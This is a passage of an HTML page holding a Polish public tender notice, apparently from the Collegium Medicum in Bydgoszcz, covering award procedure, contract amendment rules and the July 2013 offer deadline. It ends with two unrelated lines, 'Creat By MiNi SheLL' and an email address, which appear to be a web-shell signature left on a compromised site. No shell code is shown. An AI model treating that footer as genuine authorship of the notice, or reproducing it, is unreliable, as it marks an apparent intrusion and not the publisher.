1 ustawy. 13)W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo podpisane przez osoby uprawnione do reprezentowania Wykonawcy. Treść
pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest
upoważniony (zakres umocowania). Pełnomocnictwo należy złożyć w oryginale lub kopii poświadczonej
notarialnie za zgodność z oryginałem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie
której dokonano wyboru Wykonawcy, za wyjątkiem niżej określonych możliwości i warunków dokonania tej
zmiany: 1)Zamawiający przewiduje możliwość zmiany strony umowy tj. Wykonawcy, w sytuacji wystąpienia
sukcesji generalnej, przekształcenia, dziedziczenia spółek handlowych, sukcesji z mocy prawa, 2)
Zamawiający przewiduje możliwość zmiany terminu wykonania przedmiotu umowy, jeżeli dochowanie
terminu określonego w umowie jest niemożliwe z uwagi na: a)siłę wyższą lub inne okoliczności niezależne
od Wykonawcy lub których Wykonawca przy zachowaniu należytej staranności nie był w stanie uniknąć lub
przewidzieć, jak również inne przeszkody lub utrudnienia w wykonywaniu zadania spowodowane przez
osoby trzecie, b)konieczność wprowadzenia zmian w dokumentacji projektowej, c)wykonanie
nieprzewidzianych robót dodatkowych, 3)Zamawiający przewiduje możliwość dokonania zmiany wysokości
wynagrodzenia brutto, w przypadku zmiany przepisów obowiązujących dot. podatku od towarów i usług. 4)
Zmiany osób o których mowa w § 16 umowy. 5)Wszelkie propozycje wprowadzenia przez Wykonawcę
zmian w szczegółowym harmonogramie realizacji umowy muszą być należycie uzasadnione i
zaakceptowane przez Zamawiającego, ale nie będą one wpływać w żadnym zakresie na zwiększenie
wynagrodzenia należnego Wykonawcy ani na zmianę terminu końcowego realizacji przedmiotu umowy.
2.Dokonanie zmiany umowy w zakresie jw. wymaga uprzednio złożenia na piśmie prośby Wykonawcy
wskazującej zasadność wprowadzenia zmian i zgody Zamawiającego na jej dokonanie lub przedłożenia
propozycji zmiany przez Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cm.umk.pl (zakładka zamówienia publiczne)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego w Bydgoszczy przy ulicy Jagiellońskiej 15, budynek F, pokój nr 54, II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2013 godzina 10:00, miejsce: Siedzibia Zamawiającego w Bydgoszczy przy ulicy Jagiellońskiej 15, budynek F,
pokój nr 56 (sekretariat), II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com